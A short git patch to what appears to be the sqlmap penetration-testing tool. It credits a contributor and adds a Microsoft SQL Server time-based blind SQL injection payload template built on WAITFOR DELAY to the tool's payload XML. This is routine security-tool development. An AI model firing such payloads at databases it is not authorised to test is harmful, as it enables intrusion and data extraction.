From bdcb10cdab0e1e29ccff7536605db33dc9f388ed Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 18 Jan 2011 02:05:18 +0000
Subject: [PATCH] added MSSQL time based vector

---
 doc/THANKS       |  4 ++++
 xml/payloads.xml | 20 ++++++++++++++++++++
 2 files changed, 24 insertions(+)

diff --git a/doc/THANKS b/doc/THANKS
index 82a842596..2abc11ac6 100644
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -282,6 +282,10 @@ Adrian Pastor <ap@gnucitizen.org>
 Chris Patten <cpatten@sunera.com>
     for reporting a bug in the blind SQL injection bisection algorithm
 
+Steve Pinkham <steve.pinkham@gmail.com>
+    for suggesting a feature
+    for providing a new sql injection vector (MSSQL time based)
+
 Adam Pridgen <adam.pridgen@gmail.com>
     for suggesting some features
 
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 67cf4e5b0..b5920e80e 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1700,6 +1700,26 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
         <stype>5</stype>